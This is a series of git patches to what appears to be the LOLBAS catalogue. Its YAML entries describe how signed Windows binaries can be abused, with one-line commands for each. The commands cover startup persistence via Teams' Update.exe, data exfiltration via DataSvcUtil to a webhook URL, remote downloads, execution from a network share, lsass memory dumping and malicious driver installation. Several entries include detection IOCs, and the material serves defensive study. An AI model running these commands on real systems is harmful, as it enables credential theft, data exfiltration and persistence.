From 9642f81be7aa37b069cdefbeb8b17c341de71fd2 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Thu, 29 Oct 2020 09:12:28 +0100 Subject: [PATCH 01/32] Update Update.yml I update this LolBin to create persistence of payload.exe in the directory "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" by running payload.exe with the argument "--createShortcut" and "--removeShortcut". --- yml/OtherMSBinaries/Update.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 5195cf0..b22d000 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -92,6 +92,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --createShortcut=payload.exe -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1547 + MitreLink: https://attack.mitre.org/techniques/T1547/001/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --removeShortcut=payload.exe -l=Startup + Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1070 + MitreLink: https://attack.mitre.org/techniques/T1070/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' Code_Sample: @@ -114,4 +130,5 @@ Acknowledgement: Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' + - Person: Jesus Galvez --- From 31c7d34a00e31e7baa00fc889288de331a4da139 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 19:50:59 +0100 Subject: [PATCH 02/32] Create Update.yml This file describes LoLbin Update.exe deployed in the Whatsapp installation for Windows Operating Systems. --- yml/LOLUtilz/OtherBinaries/Update.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 yml/LOLUtilz/OtherBinaries/Update.yml diff --git a/yml/LOLUtilz/OtherBinaries/Update.yml b/yml/LOLUtilz/OtherBinaries/Update.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Update.yml @@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- From 4c67be51c1701760aae797a55a92996ac1c1e71f Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 20:05:25 +0100 Subject: [PATCH 03/32] Delete Update.yml --- yml/LOLUtilz/OtherBinaries/Update.yml | 18 ------------------ 1 file changed, 18 deletions(-) delete mode 100644 yml/LOLUtilz/OtherBinaries/Update.yml diff --git a/yml/LOLUtilz/OtherBinaries/Update.yml b/yml/LOLUtilz/OtherBinaries/Update.yml deleted file mode 100644 index 6cfa0a3..0000000 --- a/yml/LOLUtilz/OtherBinaries/Update.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- -Name: Update.exe -Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. -Author: 'Jesus Galvez' -Created: '2020-11-01' - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. - Usecase: Execute binary - Category: Execute - Privileges: User - MitreID: T1218 - MitreLink: https://attack.mitre.org/techniques/T1218/ - OperatingSystem: Windows 7 and up with Whatsapp installed -Full_Path: - - Path: '%localappdata%\Whatsapp\Update.exe' -Detection: - - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process ---- From 483482e3a33ed4f8b91214e1f8525e14553d94e0 Mon Sep 17 00:00:00 2001 From: jesgal <59289295+jesgal@users.noreply.github.com> Date: Sun, 1 Nov 2020 20:09:41 +0100 Subject: [PATCH 04/32] Create Upload.yml File describing the execution of LolBin Update.exe deployed with the installation of Whatsapp on Windows operating systems. --- yml/LOLUtilz/OtherBinaries/Upload.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 yml/LOLUtilz/OtherBinaries/Upload.yml diff --git a/yml/LOLUtilz/OtherBinaries/Upload.yml b/yml/LOLUtilz/OtherBinaries/Upload.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Upload.yml @@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- From 15d5ff302df7a7b03c79c90ae3d5fd6055126f9b Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Sat, 7 Nov 2020 14:22:24 +0100 Subject: [PATCH 05/32] Create Dllhost.yml --- yml/OSBinaries/Dllhost.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/Dllhost.yml diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml new file mode 100644 index 0000000..30c9d76 --- /dev/null +++ b/yml/OSBinaries/Dllhost.yml @@ -0,0 +1,30 @@ +--- +Name: Dllhost.exe +Description: Used by Windows to DLL Surrogate COM Objects +Author: 'Nasreddine Bencherchali' +Created: '2020-11-07' +Commands: + - Command: dllhost.exe /Processid:{CLSID} + Description: Use dllhost.exe to load a registered or hijacked COM Server payload. + Usecase: Execute a DLL Surrogate COM Object. + Category: Execute + Privileges: User + MitreID: T1546.015 + MitreLink: https://attack.mitre.org/techniques/T1546/015/ + OperatingSystem: Windows 10 (and likely previous versions) +Full_Path: + - Path: C:\Windows\System32\dllhost.exe + - Path: C:\Windows\SysWOW64\dllhost.exe +Code_Sample: +- Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/CyberRaiju/status/1167415118847598594 + - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 +Acknowledgement: + - Person: Jai Minton + Handle: '@CyberRaiju' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' +--- From bfe248b07e17ecaf903ffaef972a8ad845f5eb0c Mon Sep 17 00:00:00 2001 From: unload Date: Tue, 1 Dec 2020 22:57:09 -0300 Subject: [PATCH 06/32] Create DataSvcUtil.yml Another data exfil way with lolbins --- yml/OSBinaries/DataSvcUtil.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/DataSvcUtil.yml diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml new file mode 100644 index 0000000..e5dd633 --- /dev/null +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -0,0 +1,30 @@ +--- +Name: DataSvcUtil.exe +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. +Author: 'Ialle Teixeira' +Created: '01/12/2020' +Commands: + - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + MitreLink: https://attack.mitre.org/techniques/T1567/ + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +Code_Sample: + - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +Detection: + - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. + - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +Resources: + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +Acknowledgement: + - Person: Ialle Teixeira + Handle: '@NtSetDefault' +--- From b381d04faf527381b75194314a400f9da2f86a87 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Wed, 2 Dec 2020 11:35:49 -0500 Subject: [PATCH 07/32] Create AppInstaller.yml New lolbin for downloading files in Windows 10. --- yml/OSBinaries/AppInstaller.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/AppInstaller.yml diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml new file mode 100644 index 0000000..2b7c39d --- /dev/null +++ b/yml/OSBinaries/AppInstaller.yml @@ -0,0 +1,22 @@ +--- +Name: AppInstaller.exe +Description: Tool used for installation of AppX/MSIX applications on Windows 10 +Author: 'Wade Hickey' +Created: '2020-12-02' +Commands: + - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1333900137232523264 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From 36b28ddd9890a995d4e9e2e8b8bccc478372c8b0 Mon Sep 17 00:00:00 2001 From: michalani <27767884+michalani@users.noreply.github.com> Date: Thu, 3 Dec 2020 01:03:08 +0000 Subject: [PATCH 08/32] Update Winword.yml --- yml/OtherMSBinaries/Winword.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index b39a89f..e8373f4 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -13,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows Full_Path: + - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe @@ -38,4 +39,4 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- \ No newline at end of file +--- From deb249042b40be3dc1432c0482e195c781dd0740 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 8 Dec 2020 15:32:35 -0500 Subject: [PATCH 09/32] Update the affected operating systems for SyncAppvPublishingServer --- yml/OSBinaries/Syncappvpublishingserver.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2822c69..8c5fa8b 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- \ No newline at end of file +--- From 21f414c47915e4ce177ecf371150145cf70670d3 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:05:16 -0800 Subject: [PATCH 10/32] Create pnputil.exe --- pnputil.exe | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 pnputil.exe diff --git a/pnputil.exe b/pnputil.exe new file mode 100644 index 0000000..7611392 --- /dev/null +++ b/pnputil.exe @@ -0,0 +1,39 @@ +--- +Name: pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: + pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: Binary file used by .NET to compile c# code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Execution + Privileges required:Administrator + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + OperatingSystem: Windows 10,7 + - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll + Description: Binary file used by .NET to compile c# code to dll + Usecase: A description of the usecase + Category: Compile + Privileges required:User + MitreID: T1127 + MitreLink: https://attack.mitre.org/techniques/T1127/ + +Full_Path: + - Path: + C:\Windows\System32\PnPUtil.exe +Code_Sample: +https://github.com/LuxNoBulIshit/test.inf/blob/main/inf + +Code: +1.pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf +Acknowledgement: + - Person: +Hai Vaknin(Lux) https://github.com/LuxNoBulIshit +Avihay Eldad +AlonEliassaf http://github.com/aloneliassaf + + +--- From 0d819439c5e027fdcbb9de77857a513416c4b675 Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:14:15 -0800 Subject: [PATCH 11/32] Create pnputil.exe --- yml/OSBinaries/pnputil.exe | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 yml/OSBinaries/pnputil.exe diff --git a/yml/OSBinaries/pnputil.exe b/yml/OSBinaries/pnputil.exe new file mode 100644 index 0000000..3ce817e --- /dev/null +++ b/yml/OSBinaries/pnputil.exe @@ -0,0 +1,29 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: + pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execution + Privileges required:Administrator. + MitreID: + MitreLink: + OperatingSystem: Windows 10,7 + +Full_Path: + - Path: + C:\Windows\system32\pnputil.exe + +Code_Sample: +https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: +Hai Vaknin(Lux) https://github.com/LuxNoBulIshit +Avihay eldad +AlonEliassaf http://github.com/aloneliassaf + +--- From f59da6598c63afe641af6685c2decd427998babf Mon Sep 17 00:00:00 2001 From: LuxNoBu!!shit <51244609+LuxNoBulIshit@users.noreply.github.com> Date: Fri, 25 Dec 2020 12:22:28 -0800 Subject: [PATCH 12/32] Delete pnputil.exe --- pnputil.exe | 39 --------------------------------------- 1 file changed, 39 deletions(-) delete mode 100644 pnputil.exe diff --git a/pnputil.exe b/pnputil.exe deleted file mode 100644 index 7611392..0000000 --- a/pnputil.exe +++ /dev/null @@ -1,39 +0,0 @@ ---- -Name: pnputil.exe -Description: used for Install drivers. -Author: Hai vaknin (lux) -Created: 25/12/2020 -Commands: - - Command: - pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf - Description: Binary file used by .NET to compile c# code to .exe - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Execution - Privileges required:Administrator - MitreID: T1127 - MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 - - Command: ilasm.exe C:\Users\חי\Desktop\test.txt /dll - Description: Binary file used by .NET to compile c# code to dll - Usecase: A description of the usecase - Category: Compile - Privileges required:User - MitreID: T1127 - MitreLink: https://attack.mitre.org/techniques/T1127/ - -Full_Path: - - Path: - C:\Windows\System32\PnPUtil.exe -Code_Sample: -https://github.com/LuxNoBulIshit/test.inf/blob/main/inf - -Code: -1.pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf -Acknowledgement: - - Person: -Hai Vaknin(Lux) https://github.com/LuxNoBulIshit -Avihay Eldad -AlonEliassaf http://github.com/aloneliassaf - - ---- From 7dab1b916e485bc5e3494dc0cf89f07508f153a9 Mon Sep 17 00:00:00 2001 From: ahmad Date: Wed, 6 Jan 2021 20:48:25 -0500 Subject: [PATCH 13/32] Create remote.yml --- yml/OtherMSBinaries/Remote.yml | 43 ++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 yml/OtherMSBinaries/Remote.yml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..9f3b4d3 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml @@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Allows you to run command-line programs on remote computers +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Avoiding any writes to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file From 4254927f78d46a84e495966138b4f1ff81c223b6 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Wed, 6 Jan 2021 23:31:01 -0500 Subject: [PATCH 14/32] Update Remote.yml --- yml/OtherMSBinaries/Remote.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 9f3b4d3..8e7a935 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -1,6 +1,6 @@ --- Name: Remote.exe -Description: Allows you to run command-line programs on remote computers +Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 1/6/2021 Commands: @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -19,15 +19,15 @@ Commands: Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file - Usecase: Avoiding any writes to disk + Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: MitreLink: - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 10 + OperatingSystem: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -40,4 +40,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +--- From 080fe4ca5bf2a5dec5e70fb056ee2e9730dd17b1 Mon Sep 17 00:00:00 2001 From: ahmad Date: Sat, 9 Jan 2021 02:56:32 -0500 Subject: [PATCH 15/32] Create Adplus.yml --- yml/OtherMSBinaries/Adplus.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 yml/OtherMSBinaries/Adplus.yml diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml new file mode 100644 index 0000000..9e35b3c --- /dev/null +++ b/yml/OtherMSBinaries/Adplus.yml @@ -0,0 +1,27 @@ +--- +Name: adplus.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/9/2021 +Commands: + - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + Description: Creates a memory dump of the lsass process + Usecase: Create memory dump and parse it offline + Category: Credentials + Privileges: SYSTEM + MitreID: T1003 + MitreLink: https://attack.mitre.org/techniques/T1003/ + OperatingSystem: All Windows +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- \ No newline at end of file From be69f54245d0f0027b614eb01557c269d6ef79f1 Mon Sep 17 00:00:00 2001 From: Ahmad AS Date: Sat, 9 Jan 2021 03:00:05 -0500 Subject: [PATCH 16/32] Update Adplus.yml --- yml/OtherMSBinaries/Adplus.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 9e35b3c..d3095d9 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -7,7 +7,7 @@ Commands: - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline - Category: Credentials + Category: Dump Privileges: SYSTEM MitreID: T1003 MitreLink: https://attack.mitre.org/techniques/T1003/ @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- \ No newline at end of file +--- From 00935f154eeced5b546311d6b54d72a822b54554 Mon Sep 17 00:00:00 2001 From: wokis Date: Wed, 20 Jan 2021 14:47:23 +0100 Subject: [PATCH 17/32] Update Wsreset.yml Added detection by Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen --- yml/OSBinaries/Wsreset.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9a1cbdd..e0a9d7a 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -19,6 +19,7 @@ Code Sample: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command + - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen Resources: - Link: https://www.activecyber.us/activelabs/windows-uac-bypass - Link: https://twitter.com/ihack4falafel/status/1106644790114947073 From 64914b641ceb5b0c4519030ba2b3070b48722b24 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:48:05 +0100 Subject: [PATCH 18/32] Adjusted error on pnputil yml file --- yml/OSBinaries/pnputil.exe | 29 ----------------------------- yml/OSBinaries/pnputil.yml | 23 +++++++++++++++++++++++ 2 files changed, 23 insertions(+), 29 deletions(-) delete mode 100644 yml/OSBinaries/pnputil.exe create mode 100644 yml/OSBinaries/pnputil.yml diff --git a/yml/OSBinaries/pnputil.exe b/yml/OSBinaries/pnputil.exe deleted file mode 100644 index 3ce817e..0000000 --- a/yml/OSBinaries/pnputil.exe +++ /dev/null @@ -1,29 +0,0 @@ ---- -Name: Pnputil.exe -Description: used for Install drivers. -Author: Hai vaknin (lux) -Created: 25/12/2020 -Commands: - - Command: - pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf - Description: used for Install drivers - Usecase: add malicious driver. - Category: Execution - Privileges required:Administrator. - MitreID: - MitreLink: - OperatingSystem: Windows 10,7 - -Full_Path: - - Path: - C:\Windows\system32\pnputil.exe - -Code_Sample: -https://github.com/LuxNoBulIshit/test.inf/blob/main/inf -Acknowledgement: - - Person: -Hai Vaknin(Lux) https://github.com/LuxNoBulIshit -Avihay eldad -AlonEliassaf http://github.com/aloneliassaf - ---- diff --git a/yml/OSBinaries/pnputil.yml b/yml/OSBinaries/pnputil.yml new file mode 100644 index 0000000..fd6dbd8 --- /dev/null +++ b/yml/OSBinaries/pnputil.yml @@ -0,0 +1,23 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execution + Privileges: Administrator + MitreID: T1215 + MitreLink: https://attack.mitre.org/techniques/T1215 + OperatingSystem: Windows 10,7 +Full_Path: + - Path: C:\Windows\system32\pnputil.exe +Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: Hai Vaknin(Lux) + Handle: 'LuxNoBulIshit' + - Person: Avihay eldad + Handle: 'aloneliassaf' +--- From 2406d99f33b0eb35eb938372dbf0e5e92eb67622 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:49:19 +0100 Subject: [PATCH 19/32] Rename pnputil.yml to Pnputil.yml Casing --- yml/OSBinaries/{pnputil.yml => Pnputil.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{pnputil.yml => Pnputil.yml} (100%) diff --git a/yml/OSBinaries/pnputil.yml b/yml/OSBinaries/Pnputil.yml similarity index 100% rename from yml/OSBinaries/pnputil.yml rename to yml/OSBinaries/Pnputil.yml From b79a48f082cdde1de9ab542c0760d3aeac7ebb54 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 21 Jan 2021 22:54:58 +0100 Subject: [PATCH 20/32] Fixed Category on pnputil --- yml/OSBinaries/Pnputil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index fd6dbd8..55662df 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -7,7 +7,7 @@ Commands: - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf Description: used for Install drivers Usecase: add malicious driver. - Category: Execution + Category: Execute Privileges: Administrator MitreID: T1215 MitreLink: https://attack.mitre.org/techniques/T1215 From 3ca7bdc5422c3fe710ff54fc18401e9b5b61f190 Mon Sep 17 00:00:00 2001 From: ahmad Date: Fri, 22 Jan 2021 06:33:58 -0500 Subject: [PATCH 21/32] Fixed the url --- yml/OtherMSBinaries/Adplus.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index d3095d9..9857834 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -20,7 +20,7 @@ Code_Sample: Detection: - IOC: Resources: - - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' From 84de927a839510b52bbbd4b04c82be12ed222d03 Mon Sep 17 00:00:00 2001 From: SpookySec Date: Mon, 8 Feb 2021 16:28:25 